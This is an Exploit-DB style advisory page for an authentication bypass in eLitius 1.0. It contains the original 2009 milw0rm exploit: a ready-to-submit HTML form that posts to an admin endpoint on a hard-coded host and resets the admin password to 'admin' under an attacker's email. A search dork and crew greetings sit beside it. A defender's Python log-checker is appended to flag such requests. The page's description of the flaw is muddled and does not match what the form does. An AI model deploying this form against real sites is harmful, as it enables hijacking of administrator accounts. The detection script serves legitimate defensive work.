Vendor: eLitius
By: ThE g0bL!N
CVSS: 7,5 HIGH
Vulnerability: Authentication Bypass
CWE: 287
Product Name: eLitius
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:elitius:elitius
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

Powered by eLitius Version 1.0 Change Password

This vulnerability allows an attacker to bypass authentication and gain access to the admin panel of eLitius Version 1.0. It exists because the application does not properly validate the username and password fields. An attacker can exploit it by setting the username and password fields to 'admin' and then gain access to the admin panel.

Mitigation:

Upgrade to the latest version of eLitius.

Exploit-DB raw data:

 <title> Powered by eLitius Version 1.0 Change Password </title>
  
<form action="http://esyndicat.org/admin/manage-admin.php" method="post" name="adminForm">
  <table class="admintable">
  <tbody><tr>
   <td>
    <table class="adminform" cellpadding="0" cellspacing="0">
    <tbody>
    <tr>
     <th colspan="2">Change Password Of admin </th>
    </tr>
    <tr>
     
     
    </tr>
    <tr>
     <td>Username:</td>
     <td>
      <input name="username" class="inputbox" size="40" value="admin" type="text" readonly="readonly" />
     </td>
    </tr><tr>
     <td>Password:</td>
     <td>
      <input class="inputbox" name="password" size="40" value="admin" type="text" />
     </td>
    </tr>
    <tr>
     <td>Email:</td>
     <td><input class="inputbox" name="email" size="40" value="x0q@hotmail.fr" type="text" /></td>
    </tr>
    <tr>
     <td colspan="2">&nbsp;
     </td>
    </tr>

    </tbody>
    </table>
    <input name="task" value="" type="hidden" />
    <div style="margin-top:10px;"><input class="button" onclick="document.adminForm.task.value='edit'" type="submit" value="Save"></div>    
   </td>
   <td style="vertical-align: top; margin: 0; padding: 0;">
    <table class="adminform" cellpadding="0" cellspacing="0">
    <tr>
     <th colspan="2">Dork: Powered by eLitius Version 1.0</th>
    </tr>
<th colspan="2">Greetz To: Dos-Dz TeaM Snakes TeaM His0k4 </th>
    <tr>
     <center><td style="font-weight: bold;">Cod[3]d By ThE g0bL!N</td> </center>
    </tr>
  </table>
  </td>
  </tr>
  </tbody>
  </table>
  <input name="cid[]" value="1" type="hidden" />
<td>Download:http://www.elitius.com/</td>
</form>
 
</body>
</html>

# milw0rm.com [2009-04-16]
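
A log check a defender could run for this issue, added here as an example and not part of the original advisory or the eLitius code: it flags POSTs to the `admin/manage-admin.php` path used by the form above whose Referer is absent or off-site, as happens when a standalone HTML form like this one is submitted. The host `shop.example`, the combined access-log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Apache/nginx "combined" access-log format (assumed; adjust to your server).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Path taken from the form action shown on this page.
ADMIN_ENDPOINT = "/admin/manage-admin.php"


def suspicious_admin_posts(lines, site_host):
    """Return POSTs to the admin endpoint whose Referer is missing
    or names a host other than site_host."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # Ignore the query string; match installs in a subdirectory too.
        path = urlsplit(m["target"]).path
        if not path.endswith(ADMIN_ENDPOINT):
            continue
        # "-" or an empty Referer yields no hostname and is flagged.
        ref_host = (urlsplit(m["referer"]).hostname or "").lower()
        if ref_host != site_host.lower():
            hits.append({"ip": m["ip"], "ts": m["ts"],
                         "status": m["status"], "referer": m["referer"]})
    return hits


# Constructed sample lines (documentation IP ranges, hypothetical hosts).
SAMPLE_LOG = [
    '198.51.100.7 - - [16/Apr/2009:10:01:02 +0000] "GET /admin/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [16/Apr/2009:10:02:10 +0000] "POST /admin/manage-admin.php HTTP/1.1" 200 811 "http://shop.example/admin/manage-admin.php" "Mozilla/5.0"',
    '203.0.113.9 - - [16/Apr/2009:11:15:44 +0000] "POST /admin/manage-admin.php HTTP/1.1" 200 790 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [16/Apr/2009:11:20:03 +0000] "POST /elitius/admin/manage-admin.php HTTP/1.1" 302 0 "http://other.example/form.html" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_admin_posts(SAMPLE_LOG, "shop.example"):
        print(hit)
```

The Referer header is client-supplied, so treat hits as triage leads to correlate with admin password or email changes, and still apply the upgrade named under Mitigation.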